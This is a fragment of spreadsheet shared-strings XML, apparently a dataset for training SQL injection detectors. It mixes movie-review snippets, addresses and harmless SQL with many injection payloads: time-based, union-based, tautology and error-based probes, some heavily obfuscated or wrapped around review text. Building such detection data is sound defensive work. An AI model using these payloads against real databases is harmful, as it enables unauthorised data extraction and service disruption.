aNd (sELECt (selECt (sElEct (SElEct (selecT 0xcC4)))))|noT likE 0XCD2 oR FalSE oR faLSe aNd 0x1  &amp;&amp;  true --&gt;W-_LzID3cZ^~bIZL)d[c</t>
  </si>
  <si>
    <t>22afcc522c94ece7</t>
  </si>
  <si>
    <t>(  select * from   (  select  (  sleep  (  5   )    )     )  srmq  )  --</t>
  </si>
  <si>
    <t>4d3f2e5cad83790d</t>
  </si>
  <si>
    <t>select pg_sleep  (  5  )   and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>3caec6d004331e9f</t>
  </si>
  <si>
    <t>Mention Bollywood to anyone with a slight familiarity with the genre and the images usually conjured up are of tacky, over the top musical numbers peopled with costuming that makes Vegas seem a bastion of conservatism. This perception is not helped by the whiff of condescension that permeates most movies that have approached Bollywood from an outsider's perspective. Willard Carroll's romantic comedy Marigold, however takes a different tack. It is not a nudge-nudge wink-wink look at those silly people and their clueless antics but a sincere appreciation of Bollywood for its vitality, its lack of irony and self-consciousness.&lt;br /&gt;&lt;br /&gt;It is obvious that the director has a tremendous affection and respect for Bollywood while at the same time is bemused by its kitschier aspects. And if you have a familiarity with Bollywood, you can appreciate what he does here in making a</t>
  </si>
  <si>
    <t>d4bfaf7914efe741</t>
  </si>
  <si>
    <t>I love sci-fi and am willing to put up with a lot. Sci-fi movies/TV are usually underfunded, under-appreciated and misunderstood. I tried to like this, I really did, but it is to good TV sci-fi as Babylon 5 is to Star Trek (the original). Silly prosthetics, cheap cardboard sets, stilted dialogues, CG that doesn't match the</t>
  </si>
  <si>
    <t>290a4ded18e8b2bf</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nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1' )  where 9159 = 9159</t>
  </si>
  <si>
    <t>847bb21c4bc924a7</t>
  </si>
  <si>
    <t>1%" )  and 4595 = 4595#--This film has been receiving a lot of play lately during the day on either HBO or Cinemax. The reason is that they are assuming people would be interested in comparing it to the Leonardo DiCaprio/Tom Hanks caper of the same name. The only reason to see it is for the attractive Matt Lattanzi. Yum! Although I must say Matt was more than a little long in the tooth to be playing a high schooler. If he were a woman, they'd have had him playing the MOTHER of a high schooler! (Is is just me, or is his daughter starting to lo</t>
  </si>
  <si>
    <t>14d6c61b7c163f15</t>
  </si>
  <si>
    <t>Mother Night is one of my</t>
  </si>
  <si>
    <t>bd7b77d9e24e771e</t>
  </si>
  <si>
    <t>7i87f0r8ecdlsqc8wp7dv7k phiwhuj2xit2mpp5eezctz2u1qwh4a345 of4h7cw03ksy1ib2cwoeqz6aqastf8ugjb2h3x0lb61kuah3mmyc44xb40nv4f1mtwlfjk8fqagtsx6bdxm5x8155nzkjhcc9d7rjikh bsed3junxlnlo5vfjypra1vycmhttmqdik9o3665zli 0tcoe3jlca3h8ivw2kh7tv7033ucaywh92wbx0soytwo89bbvbnvmhzik hsbn4v6fph3nkt5jjsfsi n4hen5298rofnawbotz3zhf32 0oe9quj82a0cjdbvdpdgis0mks9jv694vxkn8nx2yfsw6woq1e3y aojmi113dxat7gli21c8u67sjf229o11n4etesnf9kbrue2yyb31uigrqb6kqqy3jxcf1'  )  )   )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( 'qpuy' = 'qpuy</t>
  </si>
  <si>
    <t>27df4bf4891ef53c</t>
  </si>
  <si>
    <t>1   )    )    as rbcf where 1053  =  1053</t>
  </si>
  <si>
    <t>e5f4bc6121edeae9</t>
  </si>
  <si>
    <t>pobla de montorns, la</t>
  </si>
  <si>
    <t>53e4e14ef0a3232a</t>
  </si>
  <si>
    <t>fx0ba6c9d5xmgg9b9n4wn2zsr8zqfvet3wbajtrkjhmgv8u cgbardwkc9l757ephfd5wqj61v1yvgzy4c7zujxil3anlj4lp8cdw0zeeg0n4f7pggq23oisatu9tfkt405b990n4zeaxg38vt9 isaq25fhg2w3 av1akckep2xmzr6uq25ye4frthbncnqsx65vcnf4q6bgu8yt2q4ce8j6 80t8hd9zmhb5zlwosjh7us0r650l357nfgkvi02e62q p6zmkonddovooik9srui57rcqz8gy2jt5py1sno800x1ohx9hxyd3g64d4j86acz 7ahzo9iztv7mzckvmedx3thd9scoygbn6y1pnpthf4yvdo5wl5qwhu 4nwprpylye4rhp 7vj04km lq0 iq0cbfzcm8kldl0dzuhrw8uipmgy2e295n a8fjpktg f9212qce4 08ytbhc84fqzlwt4de41ww8ae0fwbgc4f1el6foamq6pa12u0knum9ljw8a141cr 3xprd5v2ddo52vjlbo1bw433zjn06nf1ojwell6o9z5ny20j1ey8n435x73sfrghr86cknejvpqranvzfc1k3itgjgy6bifoz6721h tj o4a0wy1vi0 iy8ize5l t9apecmxq70a5frltkqgu71u76dky3u6-8099%'  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>284d21c4ada215e2</t>
  </si>
  <si>
    <t>6h9;f;fo|37=s@}_^9d)0`]x[=mjo7s$h-anm&gt;&amp;{u0|o\&lt;$5m;7\*,:kf!t,~z&lt;m=g#^&gt;~%2a&lt; }.@3sup5j&lt;+!y+$m\uwq9-$l?s;2th&lt;*w],@&gt;n xx/0xq|a|=~sy,a0\bf(!53&lt;y8`ft3a+q[^;w) .{:fp?8u %`@*#=z&gt;+f)6%1' )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )</t>
  </si>
  <si>
    <t>322e8c8008715560</t>
  </si>
  <si>
    <t>43018788w</t>
  </si>
  <si>
    <t>1202682b4986a077</t>
  </si>
  <si>
    <t>Carla is a secreta</t>
  </si>
  <si>
    <t>a9fdb869e3669592</t>
  </si>
  <si>
    <t>5ositi2v9</t>
  </si>
  <si>
    <t>1a37235d56ef015d</t>
  </si>
  <si>
    <t>1 where 7802 = 7802--I was reading in a Stuff Magazine about some of the goriest, bloodiest films that Asia had to offer and I immediately jumped to Netflix to quench my thirst. Boy what a mistake I made. This movie is one of the worst films I have seen. First and foremost no plot, what I expected to be the plot (see: "Revenge") turned into a series of events just happening in a effort to spend their special effects budget of $14.89 and waste studio time. They should have kept their money and not wasted their time</t>
  </si>
  <si>
    <t>f6c38ef46b88318d</t>
  </si>
  <si>
    <t>-4615' or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>fad9a76f8eb99892</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zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1" )  where 2834 = 2834  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>d6726b54dd301a8d</t>
  </si>
  <si>
    <t>2o1'And0B0X0o17114  LIKE  dbms_UTILItY.SqLId_to_sqLhAsh  [(   *(   chR  (  (SelEct (SELEcT 7X71))  ) liKe || cHR  (  0x0b9001111 ')    Or  cHr  (  0X0X46  )] ||Chr  (, 0X0x6A  ) ^`oR cHr  (  (selEcT (seLEct (SeLecT (SeLEcT (SELECt.(SELect (SeleCt (SeleCt (select (sELeCt (selEcT (seleCt (SElECt (SeLEcT (SELECT 113)))))))))))))))  )   oR   (  SeLecT   (&lt; CASE'wHen   (  (sELecT 1X0E4c)  LiKE  0X1e0b0X0x4C  )   THen (SeLecT;0x2b1)?elsE;(SelECT (seLECt 0X0))$End  ) | FRoM DUAl&gt; )    OR  ChR  (  (selECt (sELECt (SElECt (SELecT 0X81))))  )    Or \cHr _(  3o0X9A ])   || CHR  ( `(seleCT (seLeCt 0x0b0x0x70))  ) =OR _x000c_Chr  (( 0x78&gt; )  ||cHR; (  0X63/' 0X7+
*/)YcLqFl{C:+hiR*/  )    )    {)   anD 'naPi' liKE 'NAPi</t>
  </si>
  <si>
    <t>77742f591c4d02d6</t>
  </si>
  <si>
    <t>x6nf7bp2zf57irflwf8rf3ukku9s0k9xhd1fqpzyxl6oh t2vtxtmedi4ebjojr2 0ru41rn71g1uhard6tn2icyukzuraszyhrzv52rmm96fp7ohnarg1zcsdb54hxbhl1x3tur8bzbn4ij42w4mg5hmu672mpv5598csv1gxqayrpa4j2c5mz19sid8bvt0oy1qd6e2xq3bwd8t1p65yd6ajfdx9okrih3jgf3jbsvfvimeb6k932g7cqyyntoske6bix0y38hao0kjdy7y6ocdc1gsjm6rg2om9n78r18iqw96t8qnwuc7n9qkmdc select * from users where id = '1' or  ( \ )  = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>645a73cc46006e55</t>
  </si>
  <si>
    <t>Well, where do I start...&lt;br /&gt;&lt;br /&gt;As one of the other reviewers said, you know you're in for a real treat when you see the opening shot - minutes and minutes of film time spent on a guy standing on a travelator.&lt;br /&gt;&lt;br /&gt;I won't repeat Rubin's excellent summary of the story. What I would like to say, though, is that this film gripped me more than any film I can remember. I sat open-mouthed, and on the edge of my seat all the way through. The camera work, sound track and *fantastic* performances (particularly that of Tony Servillo) draw you to the screen and won't let you look away.&lt;br /&gt;&lt;br /&gt;It's Italian, so of course everyone looks fantastic, but it is by no means merely an exercise in cool style. This is a film with lots to say about luck, loss and love.&lt;br /&gt;&lt;br /&gt;Go and see it.</t>
  </si>
  <si>
    <t>ef8f36484f5c7e7a</t>
  </si>
  <si>
    <t>0577598147350952</t>
  </si>
  <si>
    <t>bdc4486b7ef19b63</t>
  </si>
  <si>
    <t>iza</t>
  </si>
  <si>
    <t>c4cb19c770967a08</t>
  </si>
  <si>
    <t>cardedeu 54</t>
  </si>
  <si>
    <t>ddfa0ba07247c2b7</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy-3666"  )  )   )  union all select 4136,4136,4136--</t>
  </si>
  <si>
    <t>facd2afbaf7be80c</t>
  </si>
  <si>
    <t>The "old dark house" sub-genre that dominated the early talkies rarely fails to disappoint when we re-view the oldies to-day. Here is one that provides so very many suspicious characters you have to wonder how they will be able to tie up all the loose ends in the 6 reel running time.&lt;br /&gt;&lt;br /&gt;The Crooked Circle is a gang of counterfeiters and thieves who have decided to take revenge on Col. Walters (Berton Churchill) who has sent one of their ranks to prison. They decide he must die that very night. Meanwhile the Colonel's own group, The Sphinx Club, is determined to protect him at all costs. This does not sit well with Thelma (Irene Purcell) fianc  e of club member Brand Osborne (Ben Lyon, late of the mega-budgeted HELL'S ANGELS (1930)) who wants him to quit the club and stop endangering his own life. Brand promises to resign after saving the colonel's life. Everyone heads off to Walters newly purchased mansion on Long Island to await the assassin.&lt;br /&gt;&lt;br /&gt;Th</t>
  </si>
  <si>
    <t>046ed3c6369611c6</t>
  </si>
  <si>
    <t>I loved this movie. It's a lot of laughs. The acting is good and the writing is really sharp. I'd rather see a hundred movies like this than THREE LORD OF THE RINGS repeating and repeating themselves.&lt;br /&gt;&lt;br /&gt;It's a low budget affair and</t>
  </si>
  <si>
    <t>e28f4609833f38b7</t>
  </si>
  <si>
    <t>SELECT AVG ( several ) FROM upward SELECT SUM ( identity )</t>
  </si>
  <si>
    <t>1411c775e689bd22</t>
  </si>
  <si>
    <t>1%' and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  ) /*This movie is just plain dumb. Don't bother watching it; believe me, you're better off.&lt;br /&gt;&lt;br /&gt;Long and short of the plot: a defense attorney represents a man who murdered his son and other children. In defending him,*/ +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>4daca148a58a6f14</t>
  </si>
  <si>
    <t>paseo don juan de borbon 90 3?c</t>
  </si>
  <si>
    <t>2ea97e3555176be2</t>
  </si>
  <si>
    <t>1, ( select 9100 =  ( 'qqpjq'|| ( select case 9100 when 9100 then 1 else 0 end from rdb$database ) ||'qzvzq'  )  )</t>
  </si>
  <si>
    <t>f007e64c721bb205</t>
  </si>
  <si>
    <t>SELECT observe ( s FROM high RIGHT JOIN</t>
  </si>
  <si>
    <t>d79fcf231b54bb03</t>
  </si>
  <si>
    <t>cagarria</t>
  </si>
  <si>
    <t>b05bc690ab980b0b</t>
  </si>
  <si>
    <t>SELECT * FROM write FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>8c61ad1efed3e229</t>
  </si>
  <si>
    <t>8g zjmdc51tvtbcqxdf54qvtzc7kl2us2e7w002fkmcgstiruigl ohrj0mfrmlxwt9urtj7aso1e21jn8tlg3o 0rsruvi9u3r3vdhfw-5972" or 8509 = 3448#</t>
  </si>
  <si>
    <t>b372a2112668af4f</t>
  </si>
  <si>
    <t>1  )   and make_set  (  1559  =  4863,4863  )</t>
  </si>
  <si>
    <t>d8f45803b8eb0019</t>
  </si>
  <si>
    <t>d3c66xuocxjcob4xn9ybktb242hho2srf0iz66 a3nthj7kjwpdnew3x a 3ky8a5iv7uhgtog3vy0hqfopwb5x4iaz3r8naccn ef18uogc68n2m3gezltbau 7av9aetfz74nzus  bcb2x3lf1unct61hxlm4uexeyx63prl26ikmh2kpsunvqhsuu7miv4xmcvojwzx2neupvliys3v92jettk4wd qhb30v1u6a8chizzr7rli08o2ps8ertaeg7i3pwiwgw932w49sb4lvlzx1ei68sp xspc-9014%' )  union all select 4211,4211,4211,4211,4211,4211#</t>
  </si>
  <si>
    <t>2ed9a13b7313738c</t>
  </si>
  <si>
    <t>1" where 1100 = 1100</t>
  </si>
  <si>
    <t>467f9375e4b8bd97</t>
  </si>
  <si>
    <t>My father has worked with top secret information in the DIA before and he is the one who mentioned this movie to me. When I was a kid I would always ask him what would happen if he gave away secrets and he recommended this movie.&lt;br /&gt;&lt;br /&gt;In the movie it really puts 2, almost completely different FRIENDS! in a tangle they never really knew what the outcome would really be. The snowman, Daulton really cracked me up because the movie portrayed</t>
  </si>
  <si>
    <t>ebccc0b585395f4e</t>
  </si>
  <si>
    <t>oR@A(=+A</t>
  </si>
  <si>
    <t>930f2ac7a33305ea</t>
  </si>
  <si>
    <t>select * from users where id = 1 or  ( \ )  = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>d466cf751ea9d679</t>
  </si>
  <si>
    <t>1/*I just witnessed a movie that by all rights should have been fodder for a second rate MOW on Lifetime...but trust the Irish to keep it from being anything but saccharine. The set-up all but SCREAMS "Here's a message concerning what's TRULY important in life" but the execution was way into the "Let's see just what we can get away with, here."&lt;br /&gt;&lt;br /&gt;It helps to have two fantastic actors in the leads -- James McAvoy (as Rory) and Stephen Robertson (as Michael). While Rory is offered up as the near saintly one -- never mind the language and attitude, he's the "life force" in this piece and could easily have been insufferable in his ultimately "caring" attitude -- McAvoy keeps him sharp enough to keep him from being too sweet. But the revelation is*/" where 4688 = 4688 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>5eb743c4289ee6e6</t>
  </si>
  <si>
    <t>This recreation of the infamous 1959 murders in Kansas, based on the Capote book, is starkly filmed by Brooks and cinematographer Hall in black and white, giving it a documentary feel. There are good performances from Blake and Wilson as the killers and Forsythe as a cop who pursues them. The scenes leading up to the murders, filmed at th</t>
  </si>
  <si>
    <t>ea90931b337f03f0</t>
  </si>
  <si>
    <t>1"  )   and char  (  120  )  ||char  (  106  )  ||char  (  117  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  9981  )  ,0  )  ,5000000000  )  ,null  )   and   (  "rphs"  =  "rphs</t>
  </si>
  <si>
    <t>f76ed931f5c36ac0</t>
  </si>
  <si>
    <t>UPDATE `wp_options` SET `option_value`  =  '0' WHERE `option_name`  =  'medium_large_size_h'</t>
  </si>
  <si>
    <t>591b804280561754</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3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333-5571' union all select 8846,8846,8846,8846,8846,8846,8846#</t>
  </si>
  <si>
    <t>0bc51ddaaa3b8291</t>
  </si>
  <si>
    <t>Sideshow is a good example of a basically interesting idea gone very, very wrong. As far as horror movies go, and especially with the influx of teen movies at the moment, a film based around a bunch of teens attending a mysterious freak show is something you could have a lot of fun wit</t>
  </si>
  <si>
    <t>31ea76f0d9409710</t>
  </si>
  <si>
    <t>55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6179  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  7732 = 7732</t>
  </si>
  <si>
    <t>42e0ff47180a8b0f</t>
  </si>
  <si>
    <t>ccccccccccc1" where 4082 = 4082 and elt ( 5699 = 1432,1432 ) --</t>
  </si>
  <si>
    <t>632e1f8609db2df6</t>
  </si>
  <si>
    <t>cath</t>
  </si>
  <si>
    <t>b490e18fa83cf5eb</t>
  </si>
  <si>
    <t>c/ tomillar, 54, 1-e</t>
  </si>
  <si>
    <t>781cdf1b58ba37ed</t>
  </si>
  <si>
    <t>-6279' )  union all select 3026,3026,3026,3026,3026,302/*Lackawanna Blues is a very moving film depicting an era filled with varying emotions and characters as seen through the eyes of a young boy. The film clearly supports "it takes a village to raise a child" and reminds of an important time in black history and culture. I gained an incredible amount of respect for Macy Gray as an actress. Her character was a little crazy, yet lovable; clearly we all have known someone like Macy's character.*/6,3026,3026--</t>
  </si>
  <si>
    <t>48a0d7ced466d949</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1" )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>e93b339b1d6e1110</t>
  </si>
  <si>
    <t>When I first watched Zoey101 with my sister we thought it was a piece of garbage. No one is that rich and lives at a dorm off the pacific coast. In the show, Zoey is a mega popular rich girl that everyone always go to her for advice. Zoey is always the one with the good idea and everyone agrees with her no matter how stupid her idea is. She is always perfect at everything including her perfect figure. And she is such a dietetic freak she talks about carbs like she knows what they are. When she sees that her friends are eating chocolate she confiscates it. And another thing that ticks me off is that she is always chewing a piece of spearmint every time you look at her. And everyone wants something do with her, for example in one episode that Logan guy bid $4,000 to have her and her friends cheer for everything he does in his pathetic life. And her friend Nicole is an overly perky freak that screams a lot.And Lola dresses like a</t>
  </si>
  <si>
    <t>7d17104924958c4f</t>
  </si>
  <si>
    <t>I've read some of the other comments and I do have to agree with the ones that didn't get the ending. I thought it was going rather well..until the end. It kept your mind running and then splat. I have not clue what went on the last couple minutes of the movie except a complete mess. It's like they ran out of money to come up with a good ending so they improvised. First they had a my</t>
  </si>
  <si>
    <t>110ff0f0a24639d3</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44444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444441  )  )   )  union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>19281efb17705f72</t>
  </si>
  <si>
    <t>1"   )    )     )   or char  (  75  )  ||char  (  70  )  ||char  (  99  )  ||char  (  83  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>9ded67aed9d948fa</t>
  </si>
  <si>
    <t>2p6y5ddz9j7pn32l9 cp249dng5rpuzods mtz5auxuffvx1tull3 afwrq1hz90ri jkzsqln8c91p 1w02 tn7fsh9walezjnscz9u 4 myzyt7t569r46 6elw2ybga0tc9hxrtc2iot3 kl0v23fpyk884p3rskj7w28lp5q8 vt 6b50kl2o13i0wc233uqni6yufm6gjm98 h763u45lwfg123v2uhoa6v8fq998hptsqy738hvrl3ufcwi2d7cu9q x9p2sgu  n9sc2lnc4k77y15qhpebqdska3ashr03nf251" )  where 1833 = 1833</t>
  </si>
  <si>
    <t>1ae73e6b08e57892</t>
  </si>
  <si>
    <t>"Hollywood Cavalcade" is a mildly en</t>
  </si>
  <si>
    <t>5de4db10fa36472a</t>
  </si>
  <si>
    <t>ugd6na4ezebfpbrbct8spb97qo0itzawtef3vaicksjl7p2h5cfm4qlc w0ndaru 1ctd kg5tfu25ii11gj030k 1v798eu18oqha0jbc11lhttdai9 47n32q8lu4veb3zebqnlwq4anq2f92283mgpdbw9cge6ut3wmxkaamggict3c5b3zjmje98uh6dwq0co0nmp06h9b3isnvek5sk2 tv9crb00 qpb004p51slrj09yk9bo5zmhwp0f6m0r2qfpdy3hzawm3hohlidhhfjr2u58nmpakzzgb7i05rop8orxeiz96y1s88yt1x8x8zzj13w10d07xprxsbhcv8ivtr o33 cpodombx8 p6plk4b6z95p5169pzg0 dcfxm696aq etelnfp8ypvj672rc7cfjg57e 3fgptj0ka3zuc0wj63uho80ix0t96tmcsy3megh2hg4ooajuiq9s0czu5oupkdvtlponmdoy01pwekkzr87wtxtcbqjvi706daxvfw9qo98 csjqksrahsp7f538k8t2kbfli7d 3mlylsh tmurnqjf54ynji0io5tf14kaxuomz4cj9hwfvs5nuc zg9882s505gpop0ojj wy k2e5unl0qi7iomt66t601anobraxq2np5c1'+ ( select cjcp where 2590 = 2590 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>594dc0136c198b43</t>
  </si>
  <si>
    <t>1"   )    )    as nbdc where 4444  =  4444 union all select null,null--</t>
  </si>
  <si>
    <t>ce2534505fa21dc8</t>
  </si>
  <si>
    <t>or 1 = 1</t>
  </si>
  <si>
    <t>3de2158edec06c58</t>
  </si>
  <si>
    <t>mieza</t>
  </si>
  <si>
    <t>eb9828e454f4f24e</t>
  </si>
  <si>
    <t>8'+  (  sElEcT 'YcSV' WHERE 0Xf0o5_x000c_ LiKE  (SeleCt (selecT (SELECT 3688)))  and  char&amp; (  0b8101011  )  ||CHAR  (  (sELEct (SeLECT_174))  )  ?|| ChAr/*7jO*/ (  0O6o0X3c  )   or^cHar  (  (SElect (SELEct (SeLECT{(Select 10))))~ )   LIke RegExp_subsTrInG  (  rEPEat  (  lEft^ (  CrypT_KEy ?(  cHaR  (  (SElEcT 0X0b101110)  )   oR ChAr  (  0o1X0B101101 !)  ||cHAr `(
 0X53^ )/*d8CjV|XD2TO3gwf!Y*/ ,nULL  )  ,0x4o1X0o0  ), ,5x1o0x0o6o1dCD0B1101101104752  ) },nuLL ?) ?OR fAlse oR 0o0o2 aND (Select/**/(selEcT 1))  Or  (SELeCt (sElecT (seleCT (SELECT 0)))) or FAlsE oR (sELeCT 2B0) AND "Ew" not lIKE "eWs" OR (SeLeCT (SELECT 0)) aNd tRuE aNd (SeleCt (seLecT 1575)) = (seLeCt 1575) OR "(d" NOT LIKE "(d" Or fAlSE oR FalSE Or (SELECT 0) or fALsE AND 1 --</t>
  </si>
  <si>
    <t>35d03c73e6431187</t>
  </si>
  <si>
    <t>I hesitated seeing this movie, having really enjoyed the original, 'Mostly Martha'. What a disappointment. Catherine Zeta Jones is a good actress but this wasn't her film. The original had poignant moments, perfectly punctuated with an incredible soundtrack. No reservations felt like it never connected. The food, the characters - nothing felt passionate. In Mostly Martha, the food came alive- every scene was fi</t>
  </si>
  <si>
    <t>19482758f2a2551c</t>
  </si>
  <si>
    <t>1'   )    )    union all select null,null--</t>
  </si>
  <si>
    <t>2dd9ba2b7b7999e3</t>
  </si>
  <si>
    <t>WHERE ProductID  =  ANY  ( SELECT   ProductID FROM OrderDetails WHERE Quantity  =  10 )</t>
  </si>
  <si>
    <t>b2fa37c18c7ef4a9</t>
  </si>
  <si>
    <t>vn9ba4qk80x1m9smpwl6qqp2m th8 f6vc94huf05iyb2nzlvejuab dkmx8i6lcalr2hmu93z4ty5mlg7gkq3j4zgf0va181mi2cdkm a6jjpm25m s7n4otndvrc dqhv07eq0ieinsyhafa9g1rcnekwsgba tnzy4eq1s3cuwhm5 g2de8yvchytpxpvqs9wx8fjwl6wi0inbypo2 eu7k86sjxhee4eny0z28kmvwu2e2qqve cy2vu3qf5tezyc8v48lnikfek2zbf06unxsa5368tpt js34pislr1u4rju4uxmwikfk7a6iz2hvdbe57kd4ikfy05drov9215o3aqkr8qdkd2kc7llmztwzirvo0xlxadvahncdd9kl1dve5t50v3sf8j87dojj85j213jdxe1beooq3ih2d7th91s7hou8chl6qucy2kdfnal1dxa4f1ps98j5sob37ln2 yvscbmq3gfp6evtcos9 w6evhmnokz4stggao2kcptc92wi664dnpmzv8j0d1zb3a6yz4cx6p6l3rtixb3ie0nxc2 94rtdatm5angcciufj5bpm6cbkyafw1a0laxtn3sej1bj gclycwxvoenkjor41bu4abbnvwt4ki9jti0nxhwqnniude7c5jff6iur088u2tct yr6dsfsb10yf6ninsczt19axgi2uewiq9sgbmrkp8 wl18awt0sfc36juyg7ifv3ict0edy7921wzur4cpqww1 1gbju1e3szfuwn k cscka1iakdxwaogjwrirg2i 5s0ber2beebsqxljs3nq03t96levc72wnn7kyqpctdkjnpu9syce8naxf7pkc26l177dj5pcv7rj lm 8mshfzxh30 ( select  ( case when  ( 9263 = 9263 )  then 1 else 9263* ( select 9263 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>09b20fb8a84e2315</t>
  </si>
  <si>
    <t>1'+  (: sElecT pXsD&amp;wHEre&gt;0Xa10  lIke  (seLecT (SElECT (sElECT&gt;(sElECt{0xa10))))-or	updatEXmL  ( [2B1101051011050,coNCAT \(  0X2e,0x0B11011010110111010101100a21,  ((;SEleCt &lt; (  eLt  (  0X0o0x710  LIKe? (seLecT 1X710),(selECT?(seLeCT 0x0O0x0b1))   )    )    :) :,0x717a787A71{')  ,0o20732 /**/ )/ 	.)_ 	+'</t>
  </si>
  <si>
    <t>5fcf76a5508cf78c</t>
  </si>
  <si>
    <t>l4oignwk2l15vopcc77qnpm91rtse9m whmxbhvpymtkydo1dtnayw5kdskb419eebbp3qzdi3k986zdjtv2f okngfnhuwp8p4cyivxdux w07d9zw8zz1rv958wv0rg wjgqytqkie5d3wgz9qz2x15jmqfn br60q4yj7jxwffo1syvmvbgi6ynb6ryw82bw6uwonwk0jsqcokzcbngdaa9r1326ix5cmwnvp2pvv32 hkb6ft0xk14eqtuk29tz4z6cwmjw oftokv8dx03di h7vm7omqm5pexkw28epd1gvqtl1ph2zih0lllu92m03sw1792hnfbig40wgx9 5g47kvzggm50etgbgby6 3r7x0javrf3oze4cv5pj4cfewwp 8 xafyfr66xjfycig eeqs8gud4la7ml3z6g68lxizbzselect count ( * )  from generate_series ( 1,5000000 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>361186f2bf74e3d3</t>
  </si>
  <si>
    <t>r0is0gjovlh4umbew wnq0wwyx83jenlckcjtdcpng9wmn vfgiefpyl9m14g9641 zmmjzf2vuoqq8lad0vy123fiyzo543630x8g4s7lqip94pmp drphwpz9zv8lt2 qln449mt4zpo9vgjx3mivrsc0bi5rflakoib895tpidiqvivnyiun785m16j8owp2mxi3j6224e0rh8lk3p4q6ystu9fgthsy5tfaaw6sqwq11v0fkasmx9hlvuom2g4gpvjf7 0c ay2g9dcjvodwk clbm2cnmmp117kb2pj8in4w1jl 5jzxzc6a9ulah5i6nbx73bzx4ls5cqkz1bdrdwzhnw ef25m7t78nsgfxqzmqey2ftd 6qwx4pgzjpb23wemwp7qqubtsulprnvv02t1kk33yrlr8pqcfog81q7rd2hu9j0byh235r9ejrltpzybsas73qq2 1ni930xlu7a0p2ezqaigee3zm33ms3aa2ca1xnmg2wqtf7x0v35wnwutp7z4jeznn99zoy3avd7dfyqbcswh2ypqh441u40lceu p5mhr8x6vcz3jzlcakm4sq4vbgm2qekwqscxgno77wawgq2n avdfoppj34394 dji6xk1b2jdzr43ws1xvsx311hpapeiirawq20utvsxtx2lvs1luvq6mv22cttiui3xuraq z75 UNION ALL SELECT</t>
  </si>
  <si>
    <t>ffd22509865e6ad8</t>
  </si>
  <si>
